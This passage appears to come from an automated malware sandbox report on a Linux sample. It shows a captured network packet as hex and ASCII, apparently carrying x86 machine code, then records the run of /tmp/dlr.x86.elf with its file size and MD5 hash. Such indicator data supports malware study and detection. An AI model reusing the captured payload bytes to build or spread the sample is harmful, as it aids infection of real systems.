                                                Jan 16, 2025 05:47:52.980592012 CET1236INData Raw: e0 07 8d 44 05 00 50 e8 d4 6a 00 00 8b 4c 24 6c 8b 59 10 c1 e3 07 8d 5c 1d 00 89 1c 24 e8 9e 6a 00 00 59 01 c3 5f 68 d3 6a 05 08 53 e8 af 6a 00 00 8b 5c 24 38 6a 01 68 da 6a 05 08 8b 54 24 74 83 c3 03 01 de 8b 82 94 02 00 00 29 d8 50 56 e8 1c 6b
                                                Data Ascii: DPjL$lY\$jY_hjSj\$8jhjT$t)PVkT$lCL$|Y\SGjY_VS\jD$lPBPB$QYX$QSj|"$QSiDjHKZ


                                                System Behavior

                                                Start time (UTC):04:47:50
                                                Start date (UTC):16/01/2025
                                                Path:/tmp/dlr.x86.elf
                                                Arguments:/tmp/dlr.x86.elf
                                                File size:18056 bytes
                                                MD5 hash:3cd1a6dd920504f427b843a85df3bfaf